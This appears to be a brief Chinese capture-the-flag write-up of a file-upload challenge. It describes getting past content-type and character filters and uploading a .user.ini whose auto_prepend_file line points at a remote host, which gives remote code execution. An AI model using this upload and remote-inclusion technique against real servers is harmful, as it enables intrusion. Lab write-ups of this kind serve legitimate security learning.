目录
思路
查看源代码,要求上传zip
上传zip后抓包,返回错误,把文件类型改成image/png,提示null
清空全部内容,提示上传成功,文件后缀也可以任意改
初步尝试发现< > ?都被过滤了,肯定不能直接写php代码了,不过可以上传php文件,就可以利用.user.ini进行日志文件包含和远程文件包含(条件需要当前目录有可执行的php文件,所以先要上传php,内容无关紧要)
.user.ini
auto_prepend_file=http://2002459365
访问上传的php文件,回显成功直接rce拿到flag
总结
…
